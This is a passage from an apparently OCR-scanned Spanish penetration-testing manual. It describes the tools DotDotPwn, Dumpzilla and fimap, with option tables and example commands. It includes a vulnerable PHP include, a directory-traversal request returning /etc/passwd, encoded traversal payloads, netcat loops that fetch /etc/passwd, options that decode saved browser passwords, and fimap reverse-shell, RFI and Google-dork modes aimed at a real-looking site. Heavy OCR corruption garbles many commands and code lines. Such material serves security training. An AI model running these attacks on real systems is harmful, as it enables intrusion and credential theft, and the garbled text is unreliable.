status=EXCLUDESTATUSCODES 

Excluir el código del estado separado por comas 

-c COOKIE, -cookie=COOKIE 


-ua=USERAGENT, -user- 
agent=USERAGENT 


-E, —follow-redirects 


-H HEADERS, -header=HEADERS 

Cabeceras a añadir 

—random-agents, —random-user-agents 






Ajustes de eonexión; 


—timeout=TIMEOUT 

Tiempo de expiraeión de la eonexión 

-ip=IP 

Resolver el nombre de la direceión IP 

-proxy=HTTPPROXY 

-http-proxy=HTTPPROXY 

Nombre del proxy HTTP y puerto asoeiado. Ejemplo: 
looalhost:8080 

—max-retries=MAXRE TRIES 


-b, —request-by-hostname 

Por defeeto solieitará la veloeidad por IP 


Informes: 


-simple-report=SIMPEEOUTPUTPIEE 

Solo rutas eneontradas 

-plain-text-report=PLAINTEXTOUTPUTFILE 

Rutas eneontradas eon eódigos de estado 

-json-report=JSONOUTPUTEILE 



Ejemplo 

./dirseareh -u google.eom -e PHP 





41. DotDotPwn 


DotDotPwn es un fuzzer muy inteligente y flexible para descubrir vulnerabilidades transversales de 
directorio en software de servidores HTTP/FTP/TFTP y plataformas web como CMS y ERP entre 
otros. 

Un directorio transversal consiste en explotar la insuficiente validación de seguridad y de la 
desinfección de nombres de archivos de entrada proporcionados por el usuario, para que los 
caracteres representando el atravesar al directorio padre se pasan a las API de archivo. El objetivo 
de este ataque es ordenar una aplicación que acceda a un archivo del ordenador que no se intenta ser 
accesible. El directorio transversal también se conoce como ataque ../ (dot dot slash), escalada de 
directorios y retroceso. Algunas formas de este ataque también son ataques de canonicalización. 


Además, tiene un módulo independiente del protocolo para enviar la carga útil deseada al 
dispositivo y al puerto especificado. Por otro lado, también se podría usar de forma secuencial 
usando el módulo STDOUT. Está escrito en lenguaje de programación perl y se puede ejecutar en * 
NIX o Plataformas de Windows. 

Ea prueba de fuzz o fuzzing es una técnica de prueba de software que proporciona datos válidos, no 
válidos, inesperados o aleatorios a las entradas de un programa. Si el programa falla, por ejemplo al 
fallar las aserciones de código incorporado, el escaneo de defectos será notado. Eas pruebas fuzz 
mejoran la seguridad del software porque a menudo encuentra descuidos y defectos extraños que los 
probadores humanos no podrían encontrar e incluso los diseñadores de pruebas humanos 
cuidadosos no podrían crear pruebas para ello. 

Ataque php 

Un ejemplo tipleo de aplicación vulnerable en código php es: 

<?php 

témplate = ‘blue.php’; 

if (isset($_COOKIE[‘TEMPLATE’])) 

Stemplare = $_COOKIE[‘TEMPEATE’]; 
inelude (“/home/users/phpguru/templates/” . $template); 

?> 

Un ataque contra este sistema podría ser enviar la siguiente solicitud HTTP: 

GET vulnerable.php HTTPl.O 
Cookie:TEMPLATE=../../../../../../../../../etc/passwd 

Genera una respuesta del servidor como ésta 
HTTP/1.0 200 OK 
Conent-Type: text/html 
Server:Apache 

root:fi3sED95ibqR6:0:1 :System Operatoríbin/ksh/ 
daemon: *: 1:1 :/tmp: 

phpguru:f8fk3j 1 OIf31.: 182: 100:Developer:/home/users/phpguru/ :^in/csh 

Algunas aplicaciones web escanean la cadena de consulta en busca de caracteres peligrosos para 
evitar vulnerabilidades transversales de directorio como: 

..\ 

../ 




Sin embargo la cadena de consulta suele estar decodificada por el URI antes de su uso. Por lo tanto 
estas aplicaciones son vulnerables al porcentaje de recorrido del directorio codificado como: 
%2e%2e%2fwhich translates to../ 

%2e%2e/which translates to../ 

..%2íwhich translates to../ 

%2e%2e%5cwhich translates to..\ 
etc. 

Empleo 

Uso: dotdotpwn.pl -m <module> -h <host> [opciones] 

Opciones: 


-m 

Módulo [http http-url ftp tftp payload stdout] 

-h 

Nombre del dispositivo 

-0 

Detección del sistema operativo para fuzzing inteligente 

-0 

Tipo de sistema operativo si se conoce ("windows", "unix" o "generic") 

-s 

Detección de la versión del servicio (banner grabber) 

-d 

Profundidad de los transversales p.e. profundidad igual a 3 igual a ../../../; por 
defecto: 6 

-f 

Nombre de archivo especifico. Predeterminado: /etc/motd 

-E 

Agregar @Extra_fdes en TraversalEngine.pm, por ejemplo, web.config, 
httpd.conf, etc. 

-S 

Usar SSL para HTTP y el módulo Payload 

-u 

URL con la parte que se va a ser fuzzed marcada como TRAVERSAL. Por 
ejemplo, http://foo:8080/id.php?x=TRAVERSAL&y=31337 

-k 

Patrón de texto para coincidir en la respuesta que se usa en los módulos http-url y 
payload, por ejemplo, "root:" de probar /etc/passwd 

-P 

Nombre de archivo con el payload que se enviará y la parte que se fuzzed, se 
marca con la palabra clave TRAVERSAL 

-X 

Puerto a conectar. Por defecto: HTTP=80; PTP=21; TPTP=69 

-t 

Tienpo en milisegundos entre cada prueba. Por defecto: 300 (0,3 segundos) 

-X 

Usar el algoritmo de bisección para detectar la profundidad exacta una vez que se 
haya encontrado una vulnerabilidad 

-e 

Extensión de archivo adjunto al final de cada cadena fuzz. Por ejemplo, ".php", 
".jpg", ".inc" 

-U 

Nombre de usuario. Por defecto: anonymous 

-P 

Contraseña. Por defecto: dot@dot.pwn 

-M 

Método HTTP a usar cuando se usa el módulo http. Métodos posibles: GET, 

POST, HEAD, COPY, MOVE. Por defecto: GET 

-r 

Nombre del archivo del informe. Predeterminado: ’HOST MM-DD- 
YYYY_HOUR-MIN.txt' 

-b 

Descanso tras encontrar la primera vulnerabilidad 





-q 

Modo silencioso. No imprime cada intento 

-c 

Continuar si no se recibieron datos del dispositivo 


Módulo HTTP 

dotdotpwn.pl -m http -h 192.168.1.1 -x 8080 -f /etc/hosts -k "localhost" -d 8 -t 200 -s 

El motor transversal creará cadenas de patrones de fuzz con 8 niveles de profundidad, luego 
DotDotPwn enviará 5 solicitudes por segundo (-t) contra el servidor web (-m) que escucha en el 
puerto 8080 (-x) e instalado en 192.168.1.1 (-h). Además intentará recuperar el fichero /etc/hosts 
(-f) y para evitar falsos positivos, se realizará una comprobación adicional contra la respuesta del 
servidor para encontrar la palabra clave "localhost" dentro, si es así, se considera vulnerable. 
Además para obtener información adicional, se recuperará el banner del servidor web (-s). 
DotDotPwn guardará los resultados del escaneo en un nombre de archivo llamado 192.168.1.1_ 
<date> _ <hour> en el directorio Reports 

dotdotpwn.pl -m http -h 192.168.1.1 -O -X -M POST -e .php -E 

DotDotPwn intentará detectar el sistema operativo que se ejecuta en el objetivo (-0) y una vez 
detectado, el motor transversal creará patrones de fuzz de acuerdo con el sistema operativo 
detectado. Después de eso, todos las solicitudes HTTP se adaptarán al método especificado, en este 
caso, el método POST en lugar de GET (-M). Al final de cada solicitud de fuzz, se agregará la 
extensión .php (-e). Ea opción -E le dice a DotDotPwn que busque los @Extra_files definidos en 
TraversalEngine.pm. Por defecto, "config.inc.php" y "web.config". Einalmente se habilita el 
algoritmo de bisección (-X) para detectar la profundidad exacta de una vulnerabilidad, por lo que 
si se encuentra una vulnerabilidad, este algoritmo intentará detectar la profundidad exacta con el 
número mínimo de solicitudes. DotDotPwn guardará los resultados del escaneo en un nombre de 
archivo llamado 192.168.1.1_ <date> _ <hour> en el directorio Reports 

Módulo HTTP-URL 

dotdotpwn.pl -m http-url -u http://192.168.1.1;10000/unauthenticated/TRAVERSAE -O -k "root:" -r 
webmin.txt 

DotDotPwn intentará detectar el sistema operativo que se ejecuta en 192.168.1.1 (-0) y una vez 
detectado, Traversal Engine creará los patrones de fuzz de acuerdo con el sistema operativo 
detectado. Después de esto, el motor reemplazará el token TRAVERSAL dentro de la URL 
especificada (-u) por los patrones transversales creados y enviará la solicitud difusa contra el 
servidor web que escucha en el puerto 10000. Einalmente, para evitar falsos positivos, se realizará 
una verificación adicional contra la respuesta del servidor para encontrar la palabra clave "root:" 
dentro, si es así, se considera vulnerable. Suponiendo que el archivo a recuperar es /etc/passwd, es 
casi seguro de que la palabra clave "root:" está al principio del archivo. DotDotPwn guardará los 
resultados del escaneo en un nombre de archivo llamado webmin.txt en el directorio Reports. 

Módulo FTP 

dotdotpwn.pl -m ftp -h 192.168.1.1 -s -U nitrOus -P nltrOuópwnzjOO -o Windows -q -r ftp_server.txt 

En primer lugar, DotDotPwn intentará obtener el mensaje de banner (-s) del servidor ETP (-m), 
y luego intentará iniciar sesión con el nombre de usuario (-U) y la contraseña (-P) especificados en 
el caso de que el servidor no permita el acceso anónimo. Una vez autenticado, intentará obtener 




archivos conocidos en los sistemas operativos Windows (-o) en la earpeta loeal "retrieved files". 
Además DotDotPwn no imprimirá los detalles de eada intento, en su lugar funcionará en modo 
sileneioso (-q) y solo imprimirá los patrones transversales vulnerables deteetados. DotDotPwn 
guardará los resultados del escaneo en un nombre de arehivo llamado ftp_server.txt (-r) en el 
directorio Reports. 

Módulo TFTP 

dotdotpwn.pl -mtftp -h 192.168.1.1 -b -t 1 -f windows/system32/drivers/etc/hosts 

DotDotPwn enviará un patrón transversal contra el servidor TFTP (-m) que sirve en 192.168.1.1 (- 
h) cada 1 milisegundo, esto signifiea, lo más rápido posible. Y luego DotDotPwn terminará la 
prueba de fuzz euando ha encontrado la primera vulnerabilidad (-b). La prueba de fuzz estará 
dirigida a un fichero especifieo ubicado en windows/system32/ drivers/ete/ hosts (-f). DotDotPwn 
guardará los resultados del eseaneo en un nombre de archivo llamado 192.168.1.1_ <date> _ 
<hour> en el direetorio Reports. 

Módulo PAYLOAD 

dotdotpwn.pl -m payload -h 192.168.1.1 -x 10000 -p payload_sample_l.txt -k "root:" -f /etc/passwd 

payload_sample_l.txt : GET/unauthenticated/TRAVERSALHTTP/1.0 

El motor transversal reemplazará el token TRAVERSAL dentro del arehivo de carga útil 
especificado (-p) por los patrones transversales ereados y enviará la earga útil difúsa contra el 
servidor tep. En este ejemplo, suponemos que es Webmin, escuchando en el puerto 10000 (-x) e 
instalado en 192.168.1.1 (-h). Einalmente DotDotPwn buseará la palabra elave "root:" (-k) en la 
respuesta del servidor, y si apareee, se considera vulnerable. Suponiendo que el arehivo a reeuperar 
es /etc/passwd (-f), es easi seguro que la palabra elave "root:" está al principio del archivo. 
DotDotPwn guardará los resultados del eseaneo en un nombre de arehivo llamado 192.168.1.1_ 
<date> _ <hour> en el direetorio Reports. 

Módulo STDOUT 

dotdotpwn.pl -m stdout -d 5 

El motor transversal creará cadenas de patrones de fuzz eon 8 niveles de profúndidad y DotDotPwn 
imprimirá los resultados en STDOUT, para que pueda usarlo como desee, por ejemplo, pasando los 
patrones del motor transversal como parámetro para otra aplicaeión, tubería, soeket, ete. 

Ejemplos de emo usar el módulo STDOUT junto con sus Scripts: 

- Pasar el patrón de fúzz como parámetro a /bin/file y lynx por diversión y prueba de coneepto: 

nitrOus@daiquiri ~/dotdotpwn-v3.0 $ for fúzz_pattem in $(./dotdotpwn.pl -m stdout -d 4 -f 
/etc/passwd); do file $fúzz_pattem; done 

../ete/passwd: eannot open '../etc/passwd' (No such file or directory) 

../../etc/passwd: eannot open '../../etc/passwd' (No such file or direetory) 

../../../etc/passwd: ASCII text 
../../../../etc/passwd: ASCII text 

..\etc\passwd: eannot open '..\etc\passwd' (No such file or directory) 

..\..\etc\passwd: eannot open '..\..\etc\passwd' (No such file or directory) 





..\..\..\etc\passwd: cannot open '..\..\..\etc\passwd' (No such fde or directory) 
... and so on.. 


nitrOus@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattem in $(./dotdotpwn.pl -m stdout -d 2 -f 
/etc/foobar | head -12); do lynx $fuzz_pattern; done 
Can't Access 'file://localhost/home/nitrOus/etc/foobar' 

Alert!: Unable to access document. 

Can't Access 'fde://localhost/home/nitr0us/dotdotpwn-v3.0/..\etc\foobar' 

Alert!: Unable to access document. 

Can't Access 'fde://localhost/home/nitr0us/dotdotpwn-v3.0/..\..\etc\foobar' 

Alert!: Unable to access document. 

Can't Access 'file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2fetc%2ífoobar' 

Alert!: Unable to access document. 

Can't Access 'file://localhost/home/nitr0us/dotdotpwn-v3.0/..%2f..%2fetc%2ffoobar' 

Alert!: Unable to access document. 

Can't Access 'fde://localhost/home/nitr0us/dotdotpwn-v3.0/..%5cetc%5cfoobar' 

Alert!: Unable to access document. 

- Para probar el concepto, primero cada patrón de fuzz se pasa a perl para crear una solicitud GET, 
que se pasa a una tuberia UNIX, recibida por netcat como STDIN y finalmente enviada a 
192.168.1.1 en el puerto 10000. Con esto, se puede ver todas las respuestas de Webmin (código 
HTML). 

nitrOus@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattem in $(./dotdotpwn.pl -m stdout -d 5 -f 
/etc/passwd); do perl -e " print\"GET /unauthenticated/$fuzz_pattern HTTP/1.0\r\n\r\n\";" | nc 
localhost 10000; done 

- Continuando con el ejemplo, simplemente filtrar la palabra clave "root:" y determinará si es 
vulnerable o no a las vulnerabilidades transversales: 

nitr0us@daiquiri ~/dotdotpwn-v3.0 $ for fuzz_pattem in $(./dotdotpwn.pl -m stdout -d 5 -f 

/etc/passwd); do perl -e " print\"GET /unauthenticated/$fuzz_pattern HTTP/1.0\r\n\r\n\";" | nc 

localhost 10000; done | grep "root:" 

root:x:0:0:root:/root:/bin/bash 

operator:x: 11:0:operator:/root:/bin/bash 

root:x:0:0:root:/root:/bin/bash 

operator:x: 11:0:operator:/root:/bin/bash 

root:x:0:0:root:/root:/bin/bash 

operator:x: 11:0:operator:/root:/bin/bash 

nitr0us@daiquiri -'/dotdotpwn-v3.0 $ VULNERABLE !!!!!!!!!!!!!!!!!!!!!!!!! 






42. Dumpzilla 


Esta aplicación solo analiza el ordenador donde se está ejeeutando. 

La aplicación Dumpzilla está desarrollada en Python 3.x y tiene eomo propósito extraer toda la 
informaeión interesante forensie de los navegadores Firefox, Iceweasel y Seamonkey a analizar. 
Funeiona bajo sistemas Fínix y Windows 32/64 bits. Funeiona en la interfaz de la línea de 
comandos, por lo que los volcados de información se pueden redirigir mediante eomandos eomo 
grep, awk, eut, sed ... Dumpzilla permite visualizar las siguientes seeeiones, personalizar la 
búsqueda y extraer eierto contenido. 

Sus earacterístieas principales son 

- Visualizaeión de eookies + DOM Storage (HTML 5). 

- Prefereneias del usuario (Permisos de dominios, configuración de proxys,...). 

- Descargas realizadas. 

- Uso de formularios web (Búsquedas, correos eleetrónieos, comentarios,..). 

- Historial. 

- Marcadores. 

- Visualizaeión / Extraeción de la Caehe HTML5 (Offiine eaehe). 

- Visualizaeión / Extracción de los "thumbnails" de sitios visitados. 

- Addons / Extensiones y las rutas o urls que han utilizado. 

- Passwords guardados en el navegador. 

- Certificados SSL añadidos como excepciones. 

- Datos de sesiones (Webs, URLs de referencia y texto usado en los formularios). 

- Visualizar la navegaeión del usuario en tiempo real, Url usada en cada pestaña / ventana y uso de 
formularios. 

Dumpzilla mostrará el hash SHA256 de cada fichero utilizado para extraer la informaeión y al final 
de la extraeeión, un resumen con los totales. 

Uso: dumpzilla browser_profde_direotory [Opciones] 

Opciones: 


-All 

Muestra todo menos los datos DOM y tampoeo extrae 
eontenidos 

—Cookies 

Muestra las eookies y el almaeenamiento DOM 

-showdom 

Muestra los datos almacenados DOM y las eookies. 

-domain <string> 

Filtra por nombre de dominio. Soporta wildcards. 

-ñame <string> 

Filtra por nombre de la cookie. Soporta wildcards. 

-hosteookie <string> 

Filtra por Vhost. Soporta wildcards. 

-aecess <date> 

Filtra la fecha de aceeso. Soporta wildcards . 

-ereate <date> 

Filtra por fecha de ereación. Soporta wildcards. 

-seeure <0/1 > 

Filtra por cookies eon la flag seeure activada l:Sí / 0:No. 

-httponly <0/1 > 

Filtra por tipo HttpOnly l:Sí / 0:No. 

-range last <start> <end> 

Filtra la fecha del último aeeeso por rango de feehas 
(YYYY-MM-DD HH:MM:SS). 




-range create <start> <end> 

Filtra la feeha de ereación por rango de fechas (YYYY- 
MM-DD HH:MM:SS). 

—Permissions 

Muestra las preferencias del usuario y los permisos 
establecidos a determinadas webs. 

-host <string> 

Filtra por dominio. Soporta wildcards. 

—Downloads 

Muestra las descargas, también las almacenadas en el 
historial y enumera los directorios de descarga. 

-range <start> <end> 

Filtra por fechas de inicialización de la descarga (YYYY- 
MM-DD HH:MM:SS). 

—Forms 

Muestra los datos de los formularios utilizados y el texto 
escrito en los mismos (Email, comentarios, búsquedas,...). 

-valué <string> 

Filtra el texto escrito en un formulario. Soporta wildcards. 

-range forms <start> <end> 

Filtra la fecha de uso del formulario por rango de fechas 
(YYYY-MM-DD HH:MM;SS). 

—History 

Muestra las web visualizadas. 

-url <string> 

Filtra por la URL. Soporta wildcards. 

-tille <title> 

Filtra por "title" de la web. Soporta wildcards. 

-date <date> 

Filtra la fecha de acceso. Soporta wildcards. 

-range history <start> <end> 

Filtra la fecha de visualización por rango de fechas 
(YYYY-MM-DD HH:MM:SS). 

-frequeney 

Muestra los sitios más visitados primero. 

—Bookmarks 

Muestra los sitios almacenados en marcadores. 

-range bookmarks <start> <end> 

Filtra la última actualización / instalación por rango de 
fechas (YYYY-MM-DD HH:MM:SS). 

—Cacheofldine 

Muestra los dominios que almacenan datos ofldine 
(html5) y permite extraer sus datos. 

-range cacheoff <start> <end> 

Filtra la fecha de almacenamiento por rango de fechas 
(YYYY-MM-DD HH:MM:SS). 

-extrae! <directory> 

Extrae el contenido de la cache ofldine al directorio 
especificado. 

—Range <start> <end> 

Eiltra la fecha de cookies, descargas, formularios, 
historial, bookmarks y cache oífline por rango 
(YYYY-MM-DD HH:MM;SS).No filtra: DOM Storage, 
permisos/preferencias, addons, extensions, 
passwords/exceptions, thumbnails y session. 

—Addons 

Muestra los addons/extensiones usados en el navegador y 
las rutas/URLs usadas por los mismos. 

—Passwords 

Muestra los usuarios y passwords guardados, si no se usó 
clave maestra, los decodifica 

—Certoverride 

Muestra los certificados SSL añadidos por el usuario. 

—Session 

Muestra los datos de la última y penúltima sesión. 

Ultimas webs y formularios utilizados. 




—Wateh 

Se queda en primer plano mostrando las URLs y los 


formularios de ventanas/pestañas según va navegando el 


usuario, para terminar: Ctrl + C. Editar la eabeeera, 


indieando la ruta a Python3.x en la variable python3_path. 


Ejemplos 

• dumpzilla.py .yleSqtóe.default —Cookies -create 2013-0_-04 %:35:1% -ñame %A_ 

-hosteookie www.google.eom 

• dumpzilla.py .yleSqtóe.default —Cookies -domain google% -range last "2013-03-04 
01:28:09" "2013-03-04 01:28:51" -seeure 0 -httponly 0 -showdom 

• dumpzilla.py .mozilla/firefox/yleSqtóe.default —Wateh -text "yahoo\|live\|gmail" 

• dumpzilla.py .yleSqtóe.default —Cookies -aeeess "ló:32:18" —Permissions -host 
addons.edn.mozilla.net —History -date "14:27:32" 

• dumpzilla.py .mozilla/firefox/yleSqtóe.default -Passwords 




43. fimap 


fimap es una pequeña herramienta de Python que puede eneontrar, preparar, auditar, explotar e 
ineluso Google automátieamente para deteetar errores de inelusión de arehivos loeales y remotos en 
webapps. fimap deberia ser algo asi eomo sqlmap solo para errores LFI/RFI (Loeal File 
Inelusion/Remote File Inelusión) en lugar de inyeeeión sql. 

Caraeteristieas 

• Verifica una URL única, una lista de URL o los resultados de Google de forma totalmente 
automática. 

• Puede identificar y explotar errores de inclusión de archivos. 

• Manejo de la ruta absoluta/relativa 

• Intenta automáticamente de eliminar los sufijos con Nullbyte y otros métodos como Dot- 
Truncation. 

• Inyección de archivo remoto. 

• Inyección de logfde. 

• Prueba y explota múltiples errores:include(), include once (), require(), require_once() 

• Siempre se definen las rutas de acceso absolutas en las configuraciones. 

• Tiene un modo Blind (—enable-blind) para los casos en que el servidor ha deshabilitado los 
mensajes de error. 

• Tiene un modo de explotar interactivo que puede generar un shell en sistemas vulnerables, 
puede generar un shell inverso en sistemas vulnerables y puede hacer cualquier cosa que 
pueda imaginar a través de su interfaz de plugin. 

• Agrega sus propias cargas y parches a los archivos xml o continuos y escribe un nuevo 
plugin. 

• Tiene un modo Harvest que puede recopilar URLs de un dominio determinado para su 
posterior análisis. 

• Funciona también en ventanas. 

• Puede manejar directorios en modo RFI como: inelude ($ _GET ["inc"], . 
"/content/index.html"); ?>, inelude ($ _GET ["inc"]. " lang / index.html"); ?>, donde Null- 
Byte y el truco ? no es posible. 

• Puede usar proxys.Escanea y explota GET, POST y cookies. 

• Tiene una huella muy pequeña. 

• Puede atacar también a los servidores de Windows 

• Tiene una pequeña interfaz de plugin para escribir plugins de exploitmode 

• Explotación no interactiva 

Uso: fimap.py [opciones] 

Modo s de operación: 


-s , —single 

Modo para escanear una sola URL para errores de EL 

-m, —mass 

Modo de escaneo masivo. Verificará cada URL de una lista dada. 

-g , -google 

Modo de usar Google para adquirir las URLs. Necesita una 
consulta (-q) como consulta de búsqueda de Google. 

-H , —harvest 

Modo harvest una URL recursivamente para nuevas URL. 

Necesita una URL raiz (-u) para comenzar a rastrear alli. También 
necesita (-w) escribir una lista de URL para el modo masivo. 




-4 , —autoawesome 


Con el modo AutoAwesome, fimap buscará todos los formularios 
y encabezados encontrados en el sitio que definió e intentará 
encontrar errores de inclusión de archivos a través de ellos. 


Técnicas: 


-b , —enable-blind 

Habilita la prueba blind de FI-Bug cuando no se imprimen mensajes 
de error. 

-D , —dot-truncation 

Habilitar la técnica de truncamiento de puntos para eliminar el sufijo 
si falla el modo predeterminado (nullbyte poison). 

-M , —multiply-term=X 

Multiplica los símbolos terminales como y '/' en el camino por X. 


Variables: 


-u, —url=URL 

Ea URL que se quiere probar. 

-1, -list=LIST 

La URL-LIST que se quiere probar. 

-q, —query=QUERY 

La consulta de búsqueda de Google. Ejemplo: ’inurl: 
include.php', necesario en el modo Google (-g) 

—skip-pages=X 

Saltar las primeras X páginas del escaneo de Google. 

-p , —pages=COUNT 

Definir el número de páginas a buscar (-g). El valor 
predeterminado es 10. 

—results=COUNT 

El recuento de resultados que el buscador de Google debe 
obtener por página. Valores posibles: 10, 25, 50 o 100 

—googlesleep=TIME 

El tiempo en segundos que el buscador de Google debe 
esperar antes de cada solicitud a Google. fimap contará el 
tiempo entre 2 solicitudes y se suspenderá si es necesario 
para alcanzar su tiempo de reutilización. El valor 
predeterminado es 5. 

-w, —write=EIST 

La LIST que se escribirá si ha elegido el modo harvest 
(-H). Este archivo se abrirá en modo APPEND. 

-d, -depth=CRAWLDEPTH 

La CRAWLDEPTH (nivel de recuperación) que desea 
rastrear su sitio objetivo en modo harvest (-H). 

El valor predeterminado es 1. 

-P, -post=POSTDATA 

El POSTDATA que desea enviar. Todas las variables 
internas también serán analizadas para detectar errores de 
inclusión de archivos. 

-cookie=COOKIES 

Definir la cookie que debe enviarse con cada solicitud. 
También se analizarán las cookies para detectar errores de 
inclusión de archivos. Concatenar múltiples cookies con el 
carácter 

-ttl=SECONDS 

Definir el tiempo de vida en segundos para las solicitudes. 

El valor predeterminado es 30 segundos. 

—no-auto-detect 

Usar esta opción si no desea que fimap detecte 
automáticamente el idioma de destino en modo ciego. 

-bmin=BEIND_MIN 

Definir el recuento mínimo de directorios que fimap 
debería recorrer en modo ciego. El número predeterminado 
se define en el generic.xml 






-bmax=BLIND_MAX 

Definir el eonteo máximo de direetorios que fimap debería 
recorrer. 

—dot-trune-min=700 

El recuento de puntos para comenzar en el modo dot- 
truncation 

—dot-trune-max=2000 

El recuento de puntos para finalizar en el modo dot- 
truncation 

—dot-trune -step=5 0 

El tamaño del paso para cada ronda en modo dot-truncation 

—dot-trune-ratio=0.095 

Ea relación máxima para detectar si el modo dot-truncation 
fue exitoso. 

—dot-trunc-also-unix 

Usar esto si el modo dot-truncation también debe probarse 
en servidores Unix. 

—foree-os=OS 

Obligar a fimap a probar solo archivos para el sistema 
operativo. El sistema operativo puede ser Unix o Windows 


Kit de ataque: 


-X, —exploit 

Inicia una sesión interactiva donde puede seleccionar un objetivo y 
realizar alguna acción. 

-T, —tab-complete 

Permite TAB-Completation en modo exploit. Necesita el módulo 
readline. 


Kit de disfraees: 


-A, —user-agent=UA 

El usuario que debe ser enviado. 

—http-proxy=PROXY 

Configura el proxy con esta opción. Pero lee estos hechos: 

* El googlescanner ignorará el proxy para obtener las URL, pero el 
pentest \ attack mismo pasará por el proxy. 

* PROXY deberla estar en un formato tipo 127.0.0.1:8080 

* Es experimental 

—show-my-ip 

muestra la IP de internet, pais actual y el usuario. 


Plugins: 


—plugins 

Listar todos los plugins cargados y salir. 

-I, —install-plugins 

Mostrar algunos plugins oficiales de modo exploit que puede 
instalar y/o actualizar. 


Otros: 


—update-def 

Comprueba y actualiza los archivos de definición que se 
encuentran en el directorio config 

—test-rfi 

Una prueba rápida para ver si ha configurado bien REI 

—merge-xml=XMLEILE 

Usar esto si tiene otro XMLEILE de fimap que desea incluir en 
su propio fimap result.xml. 

-C , —enable-color 

Habilitar una salida con colores. Eunciona solo en linux. 

—force-run 

Ignorar la verificación de la instancia y simplemente ejecutar 
fimap incluso si existe un archivo de bloqueo. 

-V , — verbose=LEVEL 

Nivel detallado que se quiere recibir. 









LEVEL = 3 -> Depurar 

LEVEL = 2 -> Información (predeterminado) 

LEVEL = I -> Mensajes 

LEVEL = 0 -> Nivel alto 

—credits 

Muestra algunos créditos. 

—greetings 

Algunos saludos 

-h, —help 

Muestra esta ayuda 


Ejemplos: 

fimap.py -s -u http://target-site.com/index2.php?x= 
fimap.py -H -u http://target-site.com/ -w output.txt 
fimap.py -H -u http://target-site.com/ -d 3 -w output.txt 
fimap.py -m -1 /path/to/list/output.txt 
fimap.py -g -q inurl:index2.php?x= 

fimap.py -g -q inurl:index2.php?x= -googlesleep=5000 -p 15 -results=50 
fimap.py -x 

Ejemplo 1 

Escanear una sola URL para detectar errores de El: 

fimap.py -u 'http://localhost/test.php?file=bang&id=23' 

Ejemplo 2 

Escanear una lista de URL para detectar errores de El: 

fimap.py -m -1 Vtmp/urllist.txt' 

Ejemplo 3 

Escanear los resultados de búsqueda de Google para los errores de El: 

fimap.py -g -q 'inurhinclude.php' 

Ejemplo 4 

Harvest todos los enlaces de una página web con nivel de recurso 3 y escribir las URLs en 
/tmp/urllist 

fimap.py -H -u 'http://localhost' -d 3 -w /tmp/urllist 
Ejemplo 5 

Buscar en Google inurl:"indec.php?id=l" 

Entrar en una de las URL encontradas y ejecutar 
fimap 

-u http://www.vdxonline.com/portal/index.php?option=com_content&view=article&id=13740 

Ejemplo 6 

Al principio parece mucho, pero una vez que lo revisas, es bastante fácil elegir la sintaxis y las 
opciones, ya que encontrarás que la mayoría de las opciones y argumentos están vinculados a 
cualquiera que sea el modo que esté utilizando. Hay 4 modos básicos: single sean, mass sean, 
Google sean y Harvest. El single sean realiza una verificación LEI y audita contra una sola url. 
Simplemente proporciona la URL a escanear y funciona. 

fimap.py -s -u http://target-site.com/index2.php?x= 

Si solo va a escanear un solo sitio de destino, primero ejecutar un escaneo utilizando el modo 
Harvest para ayudar a aumentar las posibilidades de encontrar un enlace vulnerable. Simplemente 
puede apuntar FIMAP al dbectorio raiz de un sitio en modo Harvester y generará un archivo de 
salida para que alimente un mass sean. Ejecutar: 

fimap.py -H -u http://target-site.com/ -w output.txt 
Se puede definir la profundidad de rastreo agregando el indicador "-d <núm.pág. a rastrear>", ya 
que el valor predeterminado se establece en 1 










Ahora que tenemos el arehivo de salida, se pueden seguir las eosas eambiando al modo de eseaneo 
masivo y auditando todos los enlaees que eneontramos euando usamos el modo Harvest, 
simplemente apuntando al arehivo "output.txt" de los pasos anteriores y deje que haga lo suyo, asi: 
fimap.py -m -1 /path/to/list/output.txt 

Si se prefiere ejecutar algunos escaneos grandes usando Google y sus dorks favoritos, se puede 
cambiar de modo y usar la siguiente sintaxis: 
fimap.py -g -q inurl:index2.php?x= 

Se ejecutará de manera similar al modo de exploración masiva hasta que llegue al final de los 
resultados . 

Se puede definir aún más los parámetros de eseaneo de Google, definiendo el tiempo entre las 
solicitudes de Google usando “-googlesleep = <time>” y las páginas a leer los resultados con el uso 
de "-p <número de página>". Si se define el número de páginas a devolver, también se puede 
agregar el número de resultados por página a usar con la opción -results = <10,25,50,100> ", siendo 
100 el valor predeterminado. 

La sintaxis completa se veria asi: 

fimap.py -g -q inurl:index2.php?x= -googlesleep=5000 -p 15 -results=50 
Ahora una vez que haya ejecutado sus escaneos, se preguntará donde se almacenan los resultados. 
Se pueden encontrar en 2 archivos, que se deberá buscar en el sistema: fimap results (xml) y fimap- 
log (txt). Estos 2 archivos contienen los resultados almacenados de todos sus escaneos. 

También se puede escribir "-x" para ver una lista de posibles objetivos a realizar los intentos de 
explotación en contra en una agradable sesión interactiva fácil de seguir. 

Ahora intenta explotar y se verá algo asi: 


Una vez elegido el enlace, se tendrá la oportunidad de elegb la payload a usar. Las opciones 
predeterminadas consisten en un shell integrado en el sitio de destino o un shell inverso al que 
puede conectarse utilizando netcat en su sistema local. El shell fimap no es un shell interactivo, por 
lo que no se podrá usar los servicios como SSH, pero se puede usar para establecer una mayor 
escalada y enraizamiento. 

Elegir la payload y experimentar. Aqui están los resultados finales de la explotación exitosa 
utilizando el shell fimap: 

También puede jugar con el archivo de configuración para poder agregar algunas caracteristicas 
adicionales. En particular, se puede agregar soporte para probar las vulnerabilidades de REI. 
Simplemente agregar los detalles de alojamiento para el shell elegido en el archivo "config.py", 
guardarlo y luego realizar una prueba rápida para ver si está funcionando. Aqui están los 
lineas que necesitan ser editadas (en ROJO); Sugiero usar el modo ETP si tiene la capacidad de 
alojar su shell en algún lugar: 


# ETP Mode 

settings[“dynamic_rfi”][“ñp”] = {} 
settings[“dynamic_rfi”][“ftp”][“ftp_hosf’] = None 
settings[“dynamic_rfi”][“ftp”][“ftp_user”] = None 
settings[“dynamic_rfi”][“ftp”][“ftp_pass”] = None 

settings[“dynamic_rfi”][“ftp”][“ftp_path”] = None # Anón existing file without suífix. Example: 
/home/imax/public_html/payload 

settings[“dynamic_rfi”][“ftp”][“http_map”] = None # The mapped HTTP path of the file. Example: 
http://localhost/~imax/payload 


# Local Mode 



settings[“dynamic_rfi”] [“local”] = {} 

settings[“dynamic_rfi”][“local”][“local_path”] = Nonc # A non cxisting file on your filesystem 
